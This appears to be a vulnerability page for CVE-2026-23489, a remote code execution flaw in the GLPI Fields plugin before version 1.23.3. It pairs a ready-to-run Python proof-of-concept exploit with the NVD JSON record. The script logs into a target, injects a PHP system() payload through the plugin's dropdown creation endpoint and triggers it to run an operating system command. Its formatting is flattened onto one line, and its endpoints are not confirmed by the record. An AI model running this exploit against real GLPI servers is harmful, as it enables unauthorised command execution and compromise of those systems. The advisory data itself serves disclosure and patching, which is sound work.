CVE-2026-23489

import requests import json # CVE-2026-23489 PoC - GLPI Fields Plugin RCE # Target: GLPI instance with Fields plugin < 1.23.3 TARGET_URL = "http://target-glpi-url" USERNAME = "attacker_account" PASSWORD = "password" def exploit_rce(target, username, password, command): """ Exploit CVE-2026-23489: GLPI Fields Plugin RCE Requires user with dropdown creation privileges """ session = requests.Session() # Step 1: Authentication login_url = f"{target}/front/login.php" session.post(login_url, data={ 'login_name': username, 'login_password': password }) # Step 2: Create malicious dropdown with PHP payload dropdown_url = f"{target}/plugins/fields/ajax/dropdown.php" # PHP payload: system() executes OS command payload = f"<?php system('{command}'); ?>" malicious_data = { 'dropdown_name': 'malicious_field', 'dropdown_value': payload, 'itemtype': 'Computer', 'action': 'create' } response = session.post(dropdown_url, data=malicious_data) # Step 3: Trigger code execution by accessing the dropdown trigger_url = f"{target}/plugins/fields/front/dropdown.php" session.get(trigger_url, params={'id': response.json().get('id')}) return response.text # Example usage if __name__ == "__main__": result = exploit_rce(TARGET_URL, USERNAME, PASSWORD, "id > /tmp/pwned.txt") print(result)

{"cve": {"id": "CVE-2026-23489", "sourceIdentifier": "[email protected]", "published": "2026-03-16T18:16:06.800", "lastModified": "2026-03-18T13:57:05.093", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Fields is a GLPI plugin that allows users to add custom fields on GLPI items forms. Prior to version 1.23.3, it is possible to execute arbitrary PHP code from users that are allowed to create dropdowns. This issue has been patched in version 1.23.3."}, {"lang": "es", "value": "Fields es un plugin de GLPI que permite a los usuarios añadir campos personalizados en los formularios de elementos de GLPI. Antes de la versión 1.23.3, es posible ejecutar código PHP arbitrario por parte de usuarios que tienen permiso para crear desplegables. Este problema ha sido parcheado en la versión 1.23.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:teclib-edition:fields:*:*:*:*:*:glpi:*:*", "versionEndExcluding": "1.23.3", "matchCriteriaId": "D8D41280-4949-46CA-94DE-B0A44A836D0E"}]}]}], "references": [{"url": "https://github.com/pluginsGLPI/fields/releases/tag/1.23.3", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/pluginsGLPI/fields/security/advisories/GHSA-rj7q-mmx9-fhq7", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}